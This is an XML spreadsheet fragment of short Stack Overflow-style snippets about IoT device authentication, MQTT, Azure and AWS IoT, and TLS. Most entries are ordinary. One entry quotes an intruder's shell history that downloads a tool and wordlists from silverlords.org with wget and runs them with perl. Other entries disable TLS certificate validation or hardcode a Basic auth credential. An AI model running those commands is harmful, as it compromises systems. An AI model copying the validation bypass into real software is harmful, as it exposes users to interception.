Generate the certificate file for the device to enroll to the group via following command.</t>
  </si>
  <si>
    <t>You can subscribe to connect events on the topic 
$aws/events/presence/connected/+
This will allow you to correlate client Id to principal id (certificate).</t>
  </si>
  <si>
    <t>To do so, visit http://example.com/token, where http://example.com is the location of your socket.io server.</t>
  </si>
  <si>
    <t>When creating a shared access policy or registering a device in Azure IoT hub, there will be a Primary key and Secondary key pair generated.</t>
  </si>
  <si>
    <t>line12
Basically the twilio client definition needs to be similar to:
from twilio.rest import Client
client = Client(account_sid, auth_token)
so from the trace, line 12 in server.py  should be similar to
from twilio.rest import Client //this should be also changed 
twilioClient = Client(account_sid, auth_token) //this is line 12</t>
  </si>
  <si>
    <t>Here's the files in the ~/certs folder:
pi@raspberrypi:~/certs $ ls
certificate.pem.crt  private.pem.key  public.pem.key  root-CA.pem</t>
  </si>
  <si>
    <t>(The above Lambda Function triggers when a client sends a message, Do I have to re-authenticate the server to send a message to a different topic?)</t>
  </si>
  <si>
    <t>You can also use secure sockets as described here (also the sample code for using secure sockets is available in UWP Samples on GitHub).</t>
  </si>
  <si>
    <t>Each telemetry that is being received in the Field Gateway from the Edge Sensors contains a unique id in the message payload.</t>
  </si>
  <si>
    <t>An example application demonstrating this is:
https://github.com/awslabs/aws-iot-chat-example
For explicit instructions, you can read:
https://github.com/awslabs/aws-iot-chat-example/blob/master/docs/authentication.md</t>
  </si>
  <si>
    <t>The problems with the HTTP module are with near certainty related to https://github.com/nodemcu/nodemcu-firmware/issues/1707 (SSL and HTTP are problematic).</t>
  </si>
  <si>
    <t>Use the list-principal-policies api call to list the IoT policies attached to a certificate.</t>
  </si>
  <si>
    <t>The second release of the ASP.NET Identity system which was designed to replace the previous ASP.NET Membership and Simple Membership systems.</t>
  </si>
  <si>
    <t>The ASP.NET Identity system is designed to replace the previous ASP.NET Membership and Simple Membership systems.</t>
  </si>
  <si>
    <t>The third release of the ASP.NET Identity system which was designed to replace the previous ASP.NET Membership and Simple Membership systems.</t>
  </si>
  <si>
    <t>For example, if your application is a blog, you may have a Post model and a corresponding  PostPolicy to authorize user actions such as creating or updating posts.</t>
  </si>
  <si>
    <t>AIM allows merchants to customize their own payment form (the Web page that collects the customer's payment information) and receipt page (the Web page that reports a summary of the transaction back to the customer), as well as submit transactions over an end-to-end Secure Sockets Layer (SSL) 
Related Tags
authorize.net
authorize.net-arb
authorize.net-cim
authorize.net-webhooks</t>
  </si>
  <si>
    <t>In case it's helpful to anybody else, I wrote up the process I used here: http://kelan.io/2016/using-lets-encrypt-to-add-ssl-to-gitlab/
I had set up GitLab previous (via install from source), and was just trying to add SSL, using Let's Encrypt.</t>
  </si>
  <si>
    <t>All C2D from AZ Portal are sent through this Endpoint https://main.iothub.ext.azure.com/api/Service/SendMessage/ and the payload is a json that look like this: 
Keep in mind that you need to add an Authorization Header with valid Bearer token.</t>
  </si>
  <si>
    <t>Anyone know of a ready to go sample using just the regular SDK and inserting the Edge Hub certificate and connecting to/through Edge?</t>
  </si>
  <si>
    <t>Hi I am trying to connect to mqtt with my android device that I just registered but it I keep getting the error  
This is some of my code
where IOT_DEVICE_USERNAME is a string "use-token-auth"
and connectionUri is "tcp://&lt;"organization"&gt;.messaging.internetofthings.ibmcloud.com:8883" 
Something else that is interesting is that right before this error I get this log  
Unregister alarmreceiver to MqttServiced:&lt;"organisation"&gt;:&lt;"DeviceType"&gt;:&lt;"deviceId"&gt;
Here is the stackTrace of the error
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err: Not authorized to connect (5)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at org.eclipse.paho.client.mqttv3.internal.ExceptionHelper.createMqttException(ExceptionHelper.java:28)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at org.eclipse.paho.client.mqttv3.internal.ClientState.notifyReceivedAck(ClientState.java:988)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at org.eclipse.paho.client.mqttv3.internal.CommsReceiver.run(CommsReceiver.java:140)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:422)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.util.concurrent.FutureTask.run(FutureTask.java:237)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
07-06 12:27:24.214 9009-9009/wibicom.wibeacon3 W/System.err:     at java.lang.Thread.run(Thread.java:818)</t>
  </si>
  <si>
    <t>I have been configuring manually IotButton devices correctly for some weeks following the steps shown in https://docs.aws.amazon.com/iot/latest/developerguide/iot-gs.html, with the correct certificate and policy so I have been able to launch a Lambda function, but the last days I am not able to connect them.</t>
  </si>
  <si>
    <t>Accept-Charset
Accept-Encoding
Accept-Language
User-Agent
Typical values of the Transfer-Encoding header: gzip, compress, deflate, identity, *
An IANA registry maintains a complete list of official content encodings.</t>
  </si>
  <si>
    <t>Azure IoT Edge Quick Start says we can get the Event Hubs-compatible path, and service primary key from the IOThub using Azure Cli:
Is there any other way access these values from azure portal or powershell.</t>
  </si>
  <si>
    <t>Per my experience, I think you can run the python script using Azure IoTHub Client SDK without any proxy settings to communicate with Azure IoT Hub if the OS configured correctly the proxy.</t>
  </si>
  <si>
    <t>check if you can access or if you can: 
telnet p3wg4w.messaging.internetofthings.ibmcloud.com 8883
The libraries aren't using any IP to create the connection, it is using the below vars 
public static string DOMAIN = ".messaging.internetofthings.ibmcloud.com";
public static int MQTTS_PORT = 8883;
I can only think that your firewall is blocking the connection 
I've used the below sample and worked just fine for me:
https://github.com/ibm-watson-iot/iot-csharp/blob/master/sample/Gateway/SampleGateway.cs</t>
  </si>
  <si>
    <t>I would like to implement the same with the introduction of a transparent gateway, that is device -&gt; my middleware -&gt; Edge IoT Hub -&gt; Cloud IoT Hub
My issue arises from the Edge Hub seemingly not accepting the "device connect" access policy key.</t>
  </si>
  <si>
    <t>I have an application where each client has its own thing, for each thing I am creating a certificate and attaching it to the thing, I am also attaching the following policy to the certificate.</t>
  </si>
  <si>
    <t>The device information should be referred to the Request Body, it does not accept properties items in request body.</t>
  </si>
  <si>
    <t>.NET class that provides a stream used for client-server communication that uses TLS/SSL security protocols to authenticate the server and optionally the client.</t>
  </si>
  <si>
    <t>Following are some of the points that I suspect might cause this issue:
Ensure that the following IAM Policy is attached to the unauthenticated role created as part of the Identity Pool creation
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iot:AttachPrincipalPolicy",
        "iot:CreateKeysAndCertificate"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}
Ensure that the following IoT Policy is attached to the device certificate
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "iot:Connect",
      "Resource": ""
    },
    {
      "Effect": "Allow",
      "Action": [
        "iot:Publish",
        "iot:Subscribe",
        "iot:Receive"
      ],
      "Resource": ""
    }
  ]
}
Hope it helps!</t>
  </si>
  <si>
    <t>Is there a way to send data to a device in Azure IoT Hub using a shared key without first generating a SAS token?</t>
  </si>
  <si>
    <t>Merkle tree is a tree in which every leaf node is labelled with the hash of a data block and every non-leaf node is labelled with the cryptographic hash of the labels of its child nodes.</t>
  </si>
  <si>
    <t>I can see that my gateway's packets are published in topics into the mqtt broker but i don't know what should i do to pass them into my iot agent and the context broker.In addition, the phy payload of my LoRa packets is encoded and encrypted and i have a node js code to decrypt and decode them.</t>
  </si>
  <si>
    <t>During this procedure a token should be generated but I've got this exception
This exception is issued by this line
which is part of the IoT Hub Service SDK.</t>
  </si>
  <si>
    <t>However, there's a bundled plugin in the viewer which let you punch through and do a http request anyway, described here: https://evothings.com/evothings-secured-now-serving-over-https/
Hope that helps!</t>
  </si>
  <si>
    <t>The minimum required for an Azure device-to-cloud message using X.509 certificates for authentication is:
where  is the device ID as listed on the Azure IoT Hub and &lt;fully-qualified-iothubname&gt; is the IoT Hub name.</t>
  </si>
  <si>
    <t>The server uses the gssapi-data to attempt to authenticate the client; if successful the request continues and a 2xx response can also carry a WWW-Authenticate response header containing the final leg of an authentication.</t>
  </si>
  <si>
    <t>A reverse proxy server usually refers to an HTTP accelerator or load-balancer which proxies requests on behalf of the actual clients to one or more backend HTTP servers.</t>
  </si>
  <si>
    <t>What I've done So Far:
I've cross referenced another article that takes you through the freeswitch install, found here: https://wiki.freeswitch.org/wiki/Mod_dingaling
I confirmed I have the module by doing the following:
The system returns with the message that libssl-dev is already the newest version.</t>
  </si>
  <si>
    <t>I used openssl
Used openssl in order to create the CA certificate and then with a client certificate with a CN of the verification generated code I verified the Certificate.</t>
  </si>
  <si>
    <t>I managed to solve this issue with these extra lines of code:
   static int Main(string[] args)
   {
       System.Net.ServicePointManager.ServerCertificateValidationCallback +=
       delegate (object sender, System.Security.Cryptography.X509Certificates.X509Certificate certificate,
                                System.Security.Cryptography.X509Certificates.X509Chain chain,
                                System.Net.Security.SslPolicyErrors sslPolicyErrors)
       {
           return true; // ****Always accept
       };
       ...
As the only URL that will ever be used by that program is the internal IP address or the external ***.myfritz.net URL of my Fritz!Box, I think I can live with accepting all certificates.</t>
  </si>
  <si>
    <t>I analyzed this library: https://github.com/raspberrypi/firmware/blob/master/opt/vc/src/hello_pi/libs/vgfont/vgfont.h and tried use  function but I took this message on a new terminal window:
assertion failure:font.c:176:gx_priv_render_text():inited aborted
My compile build message this:
Font.c's path: https://github.com/adafruit/rpi-firmware/blob/master/vc/sdk/opt/vc/src/hello_pi/libs/vgfont/font.c.</t>
  </si>
  <si>
    <t>Compact layout
HTTP requests with file upload support
Formatted API responses for JSON and XML
HATEOS support
Image previews
Request history
Basic Auth and OAuth 1.0 helpers
Autocomplete for URL and header values
Key/value editors for adding parameters or header values.</t>
  </si>
  <si>
    <t>However, I got: 
Invalid userID () for device auth:
ClientID='d:u45vsd:ti-simplelink:9884e34e0611',
ClientIP=178.241.108.68
Connection Log Message on IBM Watson IOT Platform
CONNACK:
Connection Error: 5
Connection to broker failed, Error code: -5
BRIDGE DISCONNECTION
Error on CCS serial terminal
I have done following changes on CCS mqttclient code and IBM Watson IOT Platform:
I have changed the security level as "TLS Optional" on the security options IBM Watson IOT Platform and I have added new device with following informations:  
Organization ID       : u45vsd
  Device Type       : ti-simplelink
  Device ID     : 9884e34e0611
  Authentication Method : use-token-auth
  Authentication Token  : zzzzzzzzzzzzz
Following codes were changed in network_if.h:
define SSID_NAME               "Netmaster EB75-G"
  define SECURITY_KEY             "password"
  define SECURITY_TYPE           SL_WLAN_SEC_TYPE_WPA_WPA2
Following codes were changed in mqtt_client_app.c:
define SERVER_ADDRESS       "u45vsd.messaging.internetofthings.ibmcloud.com"
  char ClientId[64] = "d:u45vsd:ti-simplelink:9884e34e0611";
  const char *ClientUsername = "use-token-auth";
  const char *ClientPassword = "zzzzzzzzzzzzzzzzzzz";
  sprintf(ClientId, "d:u45vsd:ti-simplelink:%02x%02x%02x%02x%02x%02x",
           macAddress[0], macAddress[1], macAddress[2],
           macAddress[3], macAddress[4], macAddress[5]);
What am I missing?</t>
  </si>
  <si>
    <t>XACML defines: 
an authorization policy language
a request / response scheme
an architecture
The architecture defines the following terms:
Policy Administration Point (PAP): this is where authorization policies are authored
Policy Decision Point (PDP): this is where the policies are evaluated and decisions are reached
Policy Information Point (PIP): this is where attribute values required during the policy evaluation are fetched from.</t>
  </si>
  <si>
    <t>One simple way to do this is as follows:
1) deploy an MQTT broker on the public cloud or use a free public broker such as iot.eclipse.org if data security isn't a concern
2) Implement a javascript MQTT client on the website that can subscribe to and publish to MQTT topics on the broker
3) Implement another client on the raspberry pi in a language of your choice and link that to your devices
If you want your data to be encrypted, you can also set up transport layer security using OpenSSL certificates</t>
  </si>
  <si>
    <t>This is my /etc/mysql/mariadb.conf.d/50-server.cnf
When trying openssl s_client I get the following result:
openssl s_client -state -nbio -debug -connect 127.0.0.1:3306 | grep "ssl"
SSL_connect:before SSL initialization
SSL_connect:SSLv3/TLS write client hello
SSL_connect:error in SSLv3/TLS write client hello
1995634080:error:1408F10B:SSL routines:ssl3_get_record:wrong version number:../ssl/record/ssl3_record.c:252:
openssl s_client -connect 127.0.0.1:3306
CONNECTED(00000003)
1995855264:error:1408F10B:SSL routines:ssl3_get_record:wrong version number:../ssl/record/ssl3_record.c:252:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 5 bytes and written 176 bytes
Verification: OK
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : 0000
    Session-ID:
    Session-ID-ctx:
    Master-Key:
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1542233581
    Timeout   : 7200 (sec)
    Verify return code: 0 (ok)
    Extended master secret: no
---
I also tried to connect from another Raspi with this result:
root@DietPi:/etc/mysql/ssl# openssl s_client -state -nbio -debug -connect 192.168.1.89:3306 | grep "^ssl"
SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:error in SSLv2/v3 read server hello A
SSL_connect:error in SSLv2/v3 read server hello A
548036626192:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:782:
My research so far was not very successful.</t>
  </si>
  <si>
    <t>I'm trying to run the azure-iot-sdk-java provisioning-X509-sample.</t>
  </si>
  <si>
    <t>I have not used the Azure Iot Hub, but I would presume that it is possible to get a MQTT hostname, port, username and password, which would then be used to connect to it?</t>
  </si>
  <si>
    <t>Two clients with the same client ID are not allowed to be connected concurrently to the message broker.</t>
  </si>
  <si>
    <t>To create a device, you need to use SAS Token for IoT Hub.</t>
  </si>
  <si>
    <t>Is it possible to provision the software clients as devices with IoT Hub device provisioning service without each client having been given a unique identifier in a TPM module or a unique X.509 certificate?</t>
  </si>
  <si>
    <t>Very important: you don't want a device to create a new identity on its own in IoT Hub as that would mean that the device has credentials to manage the IoT Hub instance.</t>
  </si>
  <si>
    <t>For
  example, session state is associated with the SSLContext when it is
  negotiated through the handshake protocol by sockets created by socket
  factories provided by the context.</t>
  </si>
  <si>
    <t>Since Android Things SDK does not support Firebase Authentication, when connecting to Firebase Storage, I receive the error:
W/NetworkRequest: no auth token for request
E/StorageUtil: error getting token java.util.concurrent.ExecutionException: com.google.android.gms.internal.zzbqn: Please sign in before trying to get a token.</t>
  </si>
  <si>
    <t>I create an account on AWS and registered "My Thing", create policy and attach that policy with a certificate.</t>
  </si>
  <si>
    <t>As AWS document (https://docs.aws.amazon.com/iot/latest/developerguide/protocols.html) mentioned that 
Clients wishing to connect using MQTT with X.509 Client Certificate authentication on port 443 must implement the Application Layer Protocol Negotiation (ALPN) TLS extension and pass x-amzn-mqtt-ca as the ProtocolName in the ProtocolNameList.</t>
  </si>
  <si>
    <t>When i start the script it works well but after a some time I get following error:
Python Script
Auth.json
{
  "type": "x",
  "project_id": "x",
  "private_key_id": "x",
  "private_key": "x",
  "client_email": "x",
  "client_id": "x",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://accounts.google.com/o/oauth2/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": "x"
}</t>
  </si>
  <si>
    <t>The problem is that before the date is set by the OS, the http request to get date and time fail : The   used doesn't load the correct 
SSL certificate.</t>
  </si>
  <si>
    <t>I am using the below mqtt C library for ESP8266:
https://github.com/tuanpmt/esp_mqtt
It says it support SSL but I can't find a way to enable TLS with certificates to establish a secure connection with the broker.</t>
  </si>
  <si>
    <t>I understand the concept of transparent gateway but here are a couple of questions:
What are the benefits of using a transparent gateway as opposed to opaque gateway scenario?</t>
  </si>
  <si>
    <t>Machine Learning Studio services that you create needs to receive requests from a device that has SSL capabilities to perform HTTPS requests.</t>
  </si>
  <si>
    <t>The reasons you listed above are triggered by the following conditions:
IOTHUB_CLIENT_CONNECTION_EXPIRED_SAS_TOKEN
The SAS token (provided by the user) expired, and no longer can be used to authenticate a device against the Azure IoT Hub.</t>
  </si>
  <si>
    <t>Unlike cookie data, session data are not stored on the client side and are only shared with the client when server-side source code voluntarily makes the data available in response to a client request.</t>
  </si>
  <si>
    <t>EDIT 1 : here is an example for SSL/TLS socket
EDIT 2 : since you are talking about sensors data acquisition in the comments of your question I strongly suggest using a iot oriented communication protocol like MQTT which also provides TLS/SSL security.</t>
  </si>
  <si>
    <t>I believe the reasoning, behind attaching an identity principal to a Thing and using the MQTT Client ID to attach the connection to the Thing, is because you can actually attach the same identity principal to multiple Things and on the backend it wouldn't know the exact thing you connection should be.</t>
  </si>
  <si>
    <t xml:space="preserve">
Response to preflight request doesn't pass access control check: No
  'Access-Control-Allow-Origin'  header is present on the requested
  resource.</t>
  </si>
  <si>
    <t>Features
Make XMLHttpRequests from the browser
Make http requests from node.js
Supports the Promise API
Intercept request and response
Transform request and response data
Automatic transforms for JSON data
Client side support for protecting against XSRF</t>
  </si>
  <si>
    <t>In summary, is there a way to use .NET 3.5 sp1 connecting to IoTP with using SSL Client certificate and token?</t>
  </si>
  <si>
    <t>You may also want to try using the HTTP device sample to publish messages as it also doesn't use port 8883, which may be blocked on your network.</t>
  </si>
  <si>
    <t>Ref : https://docs.aws.amazon.com/iot/latest/apireference/API_AttachPrincipalPolicy.html
AttachPrincipalPolicy
Attaches the specified policy to the specified principal (certificate
  or other credential).</t>
  </si>
  <si>
    <t>If the leaf device is not a child device of the Edge Device, then you should be able to connect to the EdgeHub using the device/iothub scoped key, since then the EdgeHub will authenticate the device with IoTHub.</t>
  </si>
  <si>
    <t>For device-to-cloud messaging, the device can use the MQTT, MQTT-WS, AMQP, AMQP-WS, or HTTP protocols.</t>
  </si>
  <si>
    <t>From AWS-IoT docs
The message broker uses the client ID to identify each client.</t>
  </si>
  <si>
    <t>If you are connecting to your Azure IoT hub using the MS IoT Python SDK then you will not need to build your own SAS token.</t>
  </si>
  <si>
    <t>Your requests can't be routed to another hub because you would be authenticating as a device on your hub.</t>
  </si>
  <si>
    <t>If you are using X.509 certificates for client authentication, you don't need to include anything in the HTTP message content to specify your authentication.</t>
  </si>
  <si>
    <t>In order to use a transparent gateway the devices need to be able to connect to a an IoT hub.</t>
  </si>
  <si>
    <t>Or if you're going to use the socket.io server at http://revealjs.jit.su, visit http://revealjs.jit.su/token.</t>
  </si>
  <si>
    <t>Trace and time http response/requests.</t>
  </si>
  <si>
    <t>Does the upload file to blob feature of the azure-iot-sdk-c currently implement any integrity  checks such as an md5 hash of the blob contents?</t>
  </si>
  <si>
    <t>I ed the /var/log/auth.log into a list of ips ordered from oldest to most recent login, if that somehow helps:
One of the first things I did after changing the password of the "user" account was running history, which gave me this result:
1  sudo
2  sudo
3  sudo service vsftpd stop
4  su clay
5  unset PROMPT_COMMAND
6  PS1='[PEXPECT]\$'
7  wget http://xpl.silverlords.org/bing -O bing
8  wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9  wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10  uname
11  n
12  uname
13  history
I then ran cat /home/user/.bash_history for more but what I already had was all that was in the file.</t>
  </si>
  <si>
    <t>To do this, look at this page: How to install OS with NOOBS (Choose Windows IoT Core instead of Raspian, at the first start from NOOBS)
Go to Azure IoT Hub documentation and follow this steps:
Create an IoT hub (Do this in the Azure Portal)
Create a device identity (Do this in a console application)
Create a simulated device app &lt;- (Do this in your Windows IoT Core project)
Change the code from 3. like you want.</t>
  </si>
  <si>
    <t>Basically what I've done is:
Picture of the hack http://m0g.net/stuff/LibeliumXBeeShieldHacked.jpeg
Solder two wires on pad next to the 0 and 1 pins
Solder the other end of the two wires on the central pin of the three pins jumper XBEE/USB (the one that is wired to the XBee).</t>
  </si>
  <si>
    <t>I shall explain in short before the code:
retrieve token from cognito federated identity in ap-northeast-1 ( tokyo ) , because cognito / federated identity is available there
use that token to log into aws IOT in ap-southeast-1 ( singapore )
fails with :  Error: AMQJS0007E Socket error: Unknown socket error.</t>
  </si>
  <si>
    <t>Instead of that can we have spring boot server which will expose a login/signup/action rest endpoint for all the above clients where the spring boot will authenticate/signup with Congnito on behalf of the clients and send the access_token response back to the client.</t>
  </si>
  <si>
    <t>You must attach an IoT policy (exactly like the ones that are attached to your devices) to the cognito identity using the AttachPrincipalPolicy API
Step 2 is where I was stuck earlier today as it was not particularly clear anywhere that this was required.</t>
  </si>
  <si>
    <t>I see an article http://wso2.com/library/articles/2016/06/article-the-basics-of-mqtt-and-how-wso2-products-support-mqtt-protocol/ where a custom broked authenticator can be defined.</t>
  </si>
  <si>
    <t>// const auth = require('feathers-authentication-client');
const io = require('socket.io-client/dist/socket.io');
const socket = io('http://192.168.0.51:3030', { transports: ['websocket'] })
const feathersClient = feathers()
  .configure(hooks())
  .configure(socketio(socket))
//.configure(auth())
module.exports = feathersClient;
the node app which is just doing a find on my service.</t>
  </si>
  <si>
    <t>I am trying to connect an ASP.NET Core edge module to the edge run time hub(local) but it does not connect and fails with an CONNECT failed: RefusedNotAuthorized exception.</t>
  </si>
  <si>
    <t>A typical exchange between a client and server would look like this:
The protocol is conceptually structured into several layers:
The Secure Transport layer provides a secure and reliable transport of messages between a client and a server.</t>
  </si>
  <si>
    <t>P:S if we subscribe to receive a message on the topic with all device type /device id /event id we may receive a message from unregistered device/gateway.</t>
  </si>
  <si>
    <t>I've gotten the individual token from my Android app using the get token instance ID method and logged it to the console on Android Studio and have successfully sent a message to myself through the standard Firebase console using this token, so the token is correct I assume.</t>
  </si>
  <si>
    <t>What I want to achieve:
I want to have an unique identifier for each raspberry pi which is running node-red and simultaneously being a mosquitto client so that the clients can publish their unique identity to the broker.</t>
  </si>
  <si>
    <t>Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.</t>
  </si>
  <si>
    <t>I am beginning to use the sample IBM-IOT C# sample code as per
https://github.com/ibm-watson-iot/iot-csharp/blob/master/docs/Gateway.rst
however I get "An invalid IP address was specified."</t>
  </si>
  <si>
    <t>First of all I generate SaS token and connect to IoT HUB.</t>
  </si>
  <si>
    <t>Please Log In&lt;/h1&gt;
        &lt;form action="/" method="post"&gt;
        Password: &lt;input type="password" name="password" /&gt;
        &lt;input type="submit" value="Go" /&gt;
        &lt;/form&gt;
    &lt;/body&gt;
&lt;/html&gt;
'''
error_page = '''
&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;
            403 - Forbidden
        &lt;/title&gt;
        &lt;style&gt;
            p {
                font-size: 100px;
            }
        &lt;/style&gt;
    &lt;/head&gt;
    &lt;body&gt;
        &lt;p&gt;Incorrect Password&lt;/p&gt;
        &lt;a href="/"&gt;&lt;h3&gt;Try Again&lt;/h5&gt;&lt;/a&gt;
    &lt;/body&gt;
&lt;/html&gt;
'''
hello = '''
&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;
            Hello World!</t>
  </si>
  <si>
    <t>Now, because there are alot of messages being sent from CAN, inside the thread for each client there is a new thread that puts all the messages received in a buffer from where they are sent one after another to all the clients or only to one, if the message is private.</t>
  </si>
  <si>
    <t>for example:
when device make first time conection with its client certificate to IoT server, lambda gets certificate_id but does not get client_id
afterwards on publishing any topic I can get client_id but does not get certificate_id
I've tried to get client_id by this rule when first time client make connection to IoT.</t>
  </si>
  <si>
    <t>Make sure the domain requesting the data (localhost) is allowed in the Access-Control-Allow-Origin header, as well as the http verb (GET, POST, PUT... or * for every http methods).</t>
  </si>
  <si>
    <t>That works in the sense of creating and maintaining a valid gzip file, since the gzip format permits concatenated gzip streams.</t>
  </si>
  <si>
    <t>Let's also assume that her lightbulb device already has a certificate on it and a policy in IoT so that it can connect to the IoT platform and then publish and subscribe to a few topics.</t>
  </si>
  <si>
    <t>CORS Anywhere is a NodeJS proxy which adds CORS headers to the proxied request.</t>
  </si>
  <si>
    <t>and i get this output on my console
But still i want to ask or understand (what i studied from the available resources) that who ever is opening a SSL socket need to have a SSL certificate, where we are doing that part of sending our SSL certificate to the server or that is being done by openssl library.</t>
  </si>
  <si>
    <t>Also CA chains tend to have more than one layer (Primary CA cert signs Intermediate CA cert) so I would expect you to need to add more than one cert to the trust store.</t>
  </si>
  <si>
    <t>I got them from sparkfun:
https://www.sparkfun.com/products/11361
https://www.sparkfun.com/products/11287
and every time i try to run this code:
i get a WiFi shield not present.</t>
  </si>
  <si>
    <t>While sending events to IOT Hub using IOT REST APIs, I can only see Authorization header accepting SAS token.</t>
  </si>
  <si>
    <t>Shouldn't it be validated based on chain of intermediate and root CA certs uploaded to Azure in previous steps?</t>
  </si>
  <si>
    <t>Pls Refer;
https://github.com/Azure/azure-iot-sdk-java
https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-devguide-security#supported-x509-certificates</t>
  </si>
  <si>
    <t>Subscription
Publisher
mosquitto_pub -h orgId.messaging.internetofthings.ibmcloud.com -p 8883 -i d:orgId:dType:device02 -u use-token-auth -P token --cafile messaging.pem -t iot-2/evt/data/fmt/json -f some.json</t>
  </si>
  <si>
    <t>Trying to work with sym keys to provisioning using azure dps
MSFT ref docs: How to provision legacy devices using symmetric keys.</t>
  </si>
  <si>
    <t>:
client.print("Authorization: Basic eGJtYzp4Ym1j\r\n");
You can also use https://github.com/adamvr/arduino-base64 library for the base64 encoding.</t>
  </si>
  <si>
    <t>This is the normal set-up to query via HTTP:
Check if there is registration in the network
Check if you are attached to the network
Set the bearer profile 1 (take a look if it sets a valid IP)
AT+SAPBR=3,1,"Contype","GPRS"
AT+SAPBR=3,1,"APN","APNdirection"
AT+SAPBR=3,1,"USER","APNuser"
AT+SAPBR=3,1,"PWD","APNpassword"
AT+SAPBR=2,1
AT+SAPBR=1,1
Start HTTP
AT+HTTPINIT
Select bearer 1
AT+HTTPPARA="CID",1
Set the URL you want to request
AT+HTTPPARA="URL","google.com"
Start the GET action
AT+HTTPACTION=0
Read once it has finished
AT+HTTPREAD
Terminate HTTP
AT+HTTPTERM</t>
  </si>
  <si>
    <t>But there really needs to be a way to get it via CloudFormation :(
http://docs.aws.amazon.com/cli/latest/reference/iot/describe-certificate.html</t>
  </si>
  <si>
    <t>The devices are unaware that they are communicating with the
  cloud via a gateway and a user interacting with the devices in IoT Hub
  is unaware of the intermediate gateway device.</t>
  </si>
  <si>
    <t>Well in MQTT, the protocol AWS IoT is using, the Clientid should be unique per Device
The client identifier (ClientId) identifies each MQTT client that
  connects to an MQTT broker.</t>
  </si>
  <si>
    <t>So, the HTTP connection request limit is actually for auth requests, which functionally is the same, but just a confusion on the docs.</t>
  </si>
  <si>
    <t>You already got the IAM policy so you are allowed to request, but it will check the AWS IOT policy attached to this identity.</t>
  </si>
  <si>
    <t>Questions about Content Security Policy should be tagged [content-security-policy].</t>
  </si>
  <si>
    <t>It extracts cookies from HTTP requests and returns them in HTTP responses.</t>
  </si>
  <si>
    <t>Homepage: https://appauth.io/ 
Android library: https://github.com/openid/AppAuth-Android 
iOS library: https://github.com/openid/AppAuth-iOS 
JS library: https://github.com/openid/AppAuth-JS</t>
  </si>
  <si>
    <t>However when I run the kubeadm join command, the worker node shows successfully joined but the weave-net and kube-proxy throws CrashLoopBackOff
kubeadm join 192.168.1.103:6443 --token &lt;&lt;token value&gt;&gt; --discovery-token-ca-cert-hash sha256:&lt;&lt;hash value&gt;&gt;
Worker node has joined the cluster:
CrashLoopBackOff Error:
and kube-proxy logs:
kubectl -n kube-system logs kube-proxy-8ffsh
gives standard_init_linux.go:190: exec user process caused "exec format error"
Can somebody please help as to where the problem could be?</t>
  </si>
  <si>
    <t>I am also requiring TLS/SSL to be enabled (as per Microsoft Azure documentation: https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-mqtt-support#tlsssl-configuration) via rejectUnauthorized: false (as explained in the documentation for MQTT.js at https://github.com/mqttjs/MQTT.js#client).</t>
  </si>
  <si>
    <t>The library can be found here: https://github.com/pawelad/pymonzo 
I have managed to set up the API access following all the instructions in the readme, saving the client ID, client secret and auth code in the auth.py file.</t>
  </si>
  <si>
    <t>That said, this will still not work even if you solve the various dependencies issues such as the Crypto one you found as the IoT Hub service doesn't support CORS meaning it will not accept requests coming from web clients.</t>
  </si>
  <si>
    <t>So in simple words azure protocol gateway helps in protocol translation while azure iot edge provides transparency and IoT Hub identity to the field devices.</t>
  </si>
  <si>
    <t>Library home:
http://konyukhov.com/soft/tank_auth/
Download link:
http://konyukhov.com/soft/tank_auth/tank_auth.zip
Project repository:
https://github.com/ilkon/Tank-Auth/</t>
  </si>
  <si>
    <t>It is here when client tries authenticate server certificate we see "Bad Certificate" being thrown.</t>
  </si>
  <si>
    <t>For devicemgt console (IOT Server Console): https://localhost:9443/devicemgt/
For carbon console: https://localhost:9443/carbon/admin/login.jsp
You may refer the docs for more information: https://docs.wso2.com/display/IoTS300/Enterprise+IoT+solution
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve"> was created since .NET Core 2.1 to implement resilient HTTP requests by addressing issues associated the with original and well-known HttpClient</t>
  </si>
  <si>
